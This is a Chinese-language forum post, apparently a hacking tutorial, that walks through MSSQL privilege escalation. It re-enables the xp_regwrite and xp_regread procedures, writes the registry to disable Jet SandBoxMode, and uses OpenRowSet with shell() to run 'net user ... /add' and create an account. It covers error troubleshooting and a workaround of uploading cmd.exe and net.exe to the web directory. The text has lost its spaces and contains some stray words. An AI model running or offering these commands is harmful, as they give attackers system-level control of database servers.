恢复对注册表的读写存储。
dbccaddextendedproc('xp_regread','xpstar.dll')
dbccaddextendedproc('xp_regwrite','xpstar.dll')
修复沙盒的保护模式
execmaster..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
查看'SandBoxMode'值是否已经变成0了。
execmaster.dbo.xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode'
最后调用沙盒模式
Select*FromOpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','selectshell("netuseritprogma单机传奇m/add")');
1.如果沙盒保护模式未“关闭”,会报错:
服务器:消息7357,级别16,状态2,行1
未能处理对象'selectshell("cmd.exe/cnetuseruserpasswd/add")'。OLEDB提供程序'microsoft.jet.oledb.4.0'指出该对象中没有任何列。
OLEDB错误跟踪[Non-interfaceerror:OLEDBproviderunabletoprocessobject,sincetheobjecthasnocolumnsProviderName='microsoft.jet.oledb.4.0',Query=selectshell("cmd.exe/cnetuseruserpasswd/add")']。
2.如果.mdb不存在或是输入路径错误
服务器:消息7399,级别16,状态1,行1
OLEDB提供程序'microsoft.jet.oledb.4.0'报错。
[OLE/DBproviderreturnedmessage:找不到文件'C:WINDOWSsystem32iasdnary1.mdb'。]
OLEDB错误跟踪[OLE/DBProvider'microsoft.jet.oledb.4.0'IDBInitialize::Initializereturned0x80004005:]。
3.如果输入过程中多了一些空格,也会报错。尤其要注意这点,很多人直接网上找文章复制粘贴进去执行。
服务器:消息7357,级别16,状态2,行1
未能处理对象'selectshell("cmd.exe/cnetuseruserpasswd/add")'。OLEDB提供程序'microsoft.jet.oledb.4.0'指出该对象中没有任何列。
OLEDB错误跟踪[Non-interfaceerror:OLEDBproviderunabletoprocessobject,sincetheobjecthasnocolumnsProviderName='microsoft.jet.oledb.4.0',Query=selectshell("cmd.exe/cnetuseruserpasswd/add")']。
4.如果mdb权限和cmd.exe权限不对,同样会也出现问题。
当mdb权限不对时,
服务器:消息7320,级别16,状态2,行1
未能对OLEDB提供程序'Microsoft.Jet.OLEDB.4.0'执行查询。
[OLE/DBproviderreturnedmessage:未知]
OLEDB错误跟踪[OLE/DBProvider'Microsoft.Jet.OLEDB.4.0'ICommandText::Executereturned0x80040e14]。
5.如果net权限不对时,却没有任何提示。
最终的提权办法就是在当前的web目录下面上传系统的ias.mdb和cmd.exe,net.exe三个文件。执行
select*fromopenrowset('microsoft.jet.oledb.4.0',';database=E:\we\bias.mdb','selectshell("E:\web\cmd.exe/cE:\web\net.exeuseruserpasswd/add")')
成功增加一个计算机用户。
*
* |
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡